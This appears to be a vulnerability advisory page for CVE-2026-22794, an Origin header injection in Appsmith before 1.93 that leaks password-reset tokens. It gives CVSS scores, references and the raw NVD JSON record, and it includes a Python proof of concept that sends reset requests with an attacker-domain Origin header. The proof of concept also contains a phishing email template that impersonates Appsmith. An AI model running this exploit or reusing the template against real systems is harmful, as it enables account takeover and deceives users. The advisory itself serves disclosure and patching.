Security Vulnerability Report
CVE-2026-22794 CVSS 9.6 CRITICAL

Published: 2026-01-12 22:16:09
Last Modified: 2026-01-21 19:14:18

Description

Appsmith is a platform to build admin panels, internal tools, and dashboards. Prior to 1.93, the server uses the Origin value from the request headers as the email link baseUrl without validation. If an attacker controls the Origin, password reset / email verification links in emails can be generated pointing to the attacker’s domain, causing authentication tokens to be exposed and potentially leading to account takeover. This vulnerability is fixed in 1.93.

CVSS Details

CVSS Score
9.6
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Note: the 9.6 CRITICAL score is the secondary (reporter) assessment with scope changed. The NVD primary assessment of the same issue is 8.8 HIGH with scope unchanged (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H). Weakness classification: CWE-346 (Origin Validation Error).

Configurations (Affected Products)

cpe:2.3:a:appsmith:appsmith:*:*:*:*:*:*:*:* - VULNERABLE
Appsmith < 1.93

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2026-22794 PoC - Origin Header Injection in Appsmith
# This PoC demonstrates the Origin header injection vulnerability
# that leads to account takeover via password reset token theft.
# Only `requests` is needed; the unused smtplib/email imports were dropped.
import requests

TARGET_URL = "https://vulnerable-appsmith-instance.com"
ATTACKER_DOMAIN = "attacker-controlled-domain.com"
ATTACKER_SERVER = f"https://{ATTACKER_DOMAIN}"


def exploit_origin_injection():
    """
    Simulate the Origin header injection attack.
    """
    print("[*] Starting CVE-2026-22794 Exploitation")

    # Step 1: Request password reset with malicious Origin header
    reset_endpoint = f"{TARGET_URL}/api/v1/users/forgot-password"
    headers = {
        "Origin": ATTACKER_SERVER,  # Malicious Origin
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
    }
    payload = {"email": "[email protected]"}

    print(f"[*] Sending password reset request with Origin: {ATTACKER_SERVER}")
    response = requests.post(reset_endpoint, json=payload, headers=headers)

    # Step 2: The server uses the attacker-controlled Origin to generate email links
    # Email will contain: https://attacker-controlled-domain.com/user/reset-password?token=XXX
    print(f"[*] Response Status: {response.status_code}")
    print("[*] Email sent to victim with malicious link")
    print(f"[*] Malicious URL: {ATTACKER_SERVER}/user/reset-password?token=<STOLEN_TOKEN>")

    # Step 3: Set up listener to capture the token
    print(f"[*] Attacker should set up listener on {ATTACKER_SERVER}")
    print("[*] When victim clicks the link, token will be exfiltrated")
    return True


def generate_phishing_email():
    """
    Generate a phishing email template that the attacker would send.
    """
    email_template = f"""
Subject: Password Reset Request

Dear User,

We received a request to reset your Appsmith account password.
Click the link below to reset your password:
{ATTACKER_SERVER}/user/reset-password?token={{token}}

If you did not request this, please ignore this email.

Best regards,
Appsmith Team
"""
    return email_template


if __name__ == "__main__":
    exploit_origin_injection()
```

References

- Patch: https://github.com/appsmithorg/appsmith/commit/6f9ee6226bac13fb4b836940b557913fff78b633
- Vendor Advisory (GHSA-7hf5-mc28-xmcv): https://github.com/appsmithorg/appsmith/security/advisories/GHSA-7hf5-mc28-xmcv
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-22794",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-12T22:16:08.633",
    "lastModified": "2026-01-21T19:14:17.880",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Appsmith is a platform to build admin panels, internal tools, and dashboards. Prior to 1.93, the server uses the Origin value from the request headers as the email link baseUrl without validation. If an attacker controls the Origin, password reset / email verification links in emails can be generated pointing to the attacker’s domain, causing authentication tokens to be exposed and potentially leading to account takeover. This vulnerability is fixed in 1.93."
      },
      {
        "lang": "es",
        "value": "Appsmith es una plataforma para construir paneles de administración, herramientas internas y cuadros de mando. Antes de la versión 1.93, el servidor utiliza el valor Origin de los encabezados de solicitud como la baseUrl de los enlaces de correo electrónico sin validación. Si un atacante controla el Origin, se pueden generar enlaces de restablecimiento de contraseña / verificación de correo electrónico en los correos electrónicos que apunten al dominio del atacante, causando que los tokens de autenticación queden expuestos y potencialmente llevando a la toma de control de la cuenta. Esta vulnerabilidad se corrige en la versión 1.93."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
            "baseScore": 9.6,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 6.0
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-346"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:appsmith:appsmith:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "1.93",
                "matchCriteriaId": "5D0E0C12-CE13-4165-8647-F27EE6E03D0F"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/appsmithorg/appsmith/commit/6f9ee6226bac13fb4b836940b557913fff78b633",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/appsmithorg/appsmith/security/advisories/GHSA-7hf5-mc28-xmcv",
        "source": "[email protected]",
        "tags": ["Exploit", "Vendor Advisory"]
      },
      {
        "url": "https://github.com/appsmithorg/appsmith/security/advisories/GHSA-7hf5-mc28-xmcv",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "tags": ["Exploit", "Vendor Advisory"]
      }
    ]
  }
}
```